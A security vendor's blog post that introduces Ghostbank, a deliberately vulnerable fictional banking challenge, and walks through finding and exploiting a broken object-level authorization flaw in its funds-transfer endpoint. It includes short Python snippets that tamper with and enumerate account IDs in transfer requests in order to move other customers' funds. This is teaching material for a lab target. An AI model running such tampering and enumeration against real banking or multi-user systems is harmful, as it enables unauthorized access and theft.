Blog

Super-powered Application Discovery and Security Testing with Agentic AI - Part 1


Monday, February 24, 2025

Brad Geesaman

Principal Security Engineer


In his recent blog post on the power of Agentic AI as applied to Application Security, Ghost's co-founder and CEO Greg Martin wrote about the dual-use nature of Agentic AI as a "super-power" for both attackers and defenders. Considering that most folks have interacted with Large Language Models (LLMs) and have experienced their benefits and drawbacks, it may seem like a very bold claim. Let's put this assertion to the test on a practical Application Security use case: comparing the workflows for finding and validating a logic flaw in a running web application.

This is the first post in a three-part series where we introduce Ghostbank and find and validate a BOLA flaw using Reaper. In Part 2, we'll showcase ReaperBot, an Agentic AI framework, to autonomously find and validate that same BOLA flaw. Finally, in Part 3, we'll discuss best practices and some of the remaining challenges for implementing Agentic AI in production.

Ghostbank

Created by our co-founder and CTO, Josh Larsen, for a fun challenge at one of our off-site team events, ghostbank.net is a fictional banking application.  Everyone starts with $500 Ghost Bucks, with the goal of “earning” more by “interacting” with other customers:

The application makes several API calls, such as listing account balances and recent transactions, but its key function is transferring funds between accounts. The catch is, it doesn't validate the account_from parameter when you transfer funds. If you can enumerate valid account IDs belonging to other funded accounts, you can siphon money into your own account by tampering with and replaying transfer requests that use other customers' account IDs as the source.
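The tamper-and-replay idea above can be sketched in a few lines of Python. The parameter names (account_from, account_to, amount) come from the post; the helper function, the concrete ID values, and the payload shape are illustrative assumptions, not Ghostbank's actual request format.

```python
def tamper_transfer(original: dict, victim_account_id: int) -> dict:
    """Return a copy of a captured transfer payload with account_from
    swapped to another customer's account ID (the core of the BOLA attack)."""
    tampered = dict(original)
    tampered["account_from"] = victim_account_id
    return tampered

# A legitimate transfer we captured between our own accounts (values assumed):
legit = {"account_from": 512, "account_to": 513, "amount": 100}

# Replay it with someone else's account as the source:
attack = tamper_transfer(legit, victim_account_id=431)
```

If the server processes the tampered payload the same way it processed the original, the account_from parameter isn't being checked against the authenticated user, which is exactly the flaw described above.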

For a full walkthrough in complete detail, check out "How to Hack Ghostbank" in the Reaper docs. It covers everything from installing and setting up Reaper to a step-by-step guide to solving the challenge that security folks of all skill levels should be able to follow.

If you do solve the challenge and steal some Ghost Bucks, be sure to follow the instructions on the bell at the top of the page to get a very snazzy Reaper T-shirt.

The Challenges with this Challenge

Instead of walking through the entire solution here, I want to showcase the challenges with each of the workflow steps associated with discovering and validating this flaw:

Step 1: Reconnaissance

In this challenge, you are provided with the URL and the ability to get valid credentials via the sign-up functionality. As a logged-in user with $500 to start, it's up to you to interact with the app to understand what it does and which actions are common and expected. Most folks have used an online banking application before, so the ability to transfer funds is expected. The transfer form being the only source of input on the page is also a great giveaway that its API endpoint is the likely target.

But, what if:

  • This was an app with thousands of APIs and features that used them? Interacting with each one, capturing each action with an intercepting proxy, and then reasoning about them manually is incredibly difficult and time-consuming.

  • The app wasn't providing common functionality but instead was highly specialized to an industry the tester isn't familiar with? With those context clues obscured, it's much more difficult for a tester to understand what's expected and unexpected.

If this weren't a very simple application with easily understood functionality, this flaw would be a tiny needle inside a very large haystack.

Step 2: Targeting

After successfully transferring funds between your accounts, an experienced web application penetration tester would observe a POST request containing three parameters:

  • account_from: an integer that appears to be between 100 and 1000

  • account_to: an integer that appears to be between 100 and 1000

  • amount: an integer corresponding to the amount of the transfer

From there, that experience and nuanced understanding of the variants of Broken Object Level Authorization (BOLA) would lead them to the following conclusions:

  1. This is a multi-user system, so it's likely that other accounts exist with funds in them.

  2. Based on the values for account_from and account_to, those account IDs are in a similar range.

  3. They should try transfers with different values for one or both of those parameters to enumerate valid accounts and to see whether the system allows or blocks a transfer from an account that isn't theirs.

But, what if:

  • Instead of one obvious request to focus on, there were thousands of interactions to choose from?

  • This target wasn't as straightforward and the tester wasn't fully versed in the intricacies of BOLA attacks?

The reality is that analyzing large volumes of potential targets for likely candidates and producing valid attack payloads at scale is a challenge for even the best security testers.

Step 3: Exploitation/Validation

The simplest exploit approach for this flaw is to capture a valid transfer, modify either the account_from or the account_to parameter with a different value, observe the behavior change, and iterate to the next value. If at least one tampered transfer request succeeds using a source account ID that isn't ours and the money shows up in the account_to account, then we know for certain that the flaw is a true positive.
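The iterate-to-the-next-value part of this approach can be sketched as a payload generator. The 100 to 1000 ID range and the three parameter names come from the observations above; the function, our account ID, and the small-transfer amount are assumptions for illustration (actually replaying each payload against the transfer endpoint is not shown).

```python
def enumeration_payloads(my_account: int, low: int = 100, high: int = 1000,
                         amount: int = 1):
    """Yield one tampered transfer payload per candidate source account ID,
    each attempting to move a small amount into our own account."""
    for candidate in range(low, high):
        if candidate == my_account:
            continue  # skip our own account; a self-transfer proves nothing
        yield {"account_from": candidate,  # someone else's account
               "account_to": my_account,   # funds land in ours
               "amount": amount}

# Assumed: our account ID is 513.
payloads = list(enumeration_payloads(my_account=513))
```

Any candidate whose replayed payload both returns a success response and increases our balance confirms the BOLA as a true positive, exactly as described above.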

But, what if:

  • The IDs were highly random large integers, or practically unguessable values such as UUIDs?

  • There were other constraints and controls such as request rate limits?

With so many factors involved, the cognitive load of keeping all of this in context and adapting to the target environment is, in a word, exhausting.

Agentic AI's Super-power

So what makes Agentic AI a "super-power" for security teams? It's not that it's "perfect" or better than the best expert human on a single task in isolation. To me, it's that it provides outsized leverage when performing a large number of tasks in much shorter timeframes for less cost. The modern AI age is bringing about a rapid increase in the amount of code being developed and deployed. Outnumbered Application Security teams need this kind of leverage to stay on top of their deployed footprint.

Click here for Part 2 of this series where we tackle the challenges of the Ghostbank challenge with a team of orchestrated AI Agents working together with tools that interface directly with Reaper. In the meantime, give Ghostbank a shot.

Step Into The Underworld Of
Autonomous AppSec


Ghost Security provides autonomous app security with Agentic AI, enabling teams to discover, test, and mitigate risks in real time across complex digital environments.

Join our E-mail list

Join the Ghost Security email list—where we haunt vulnerabilities and banish breaches!

© 2024 Ghost Security. All rights reserved
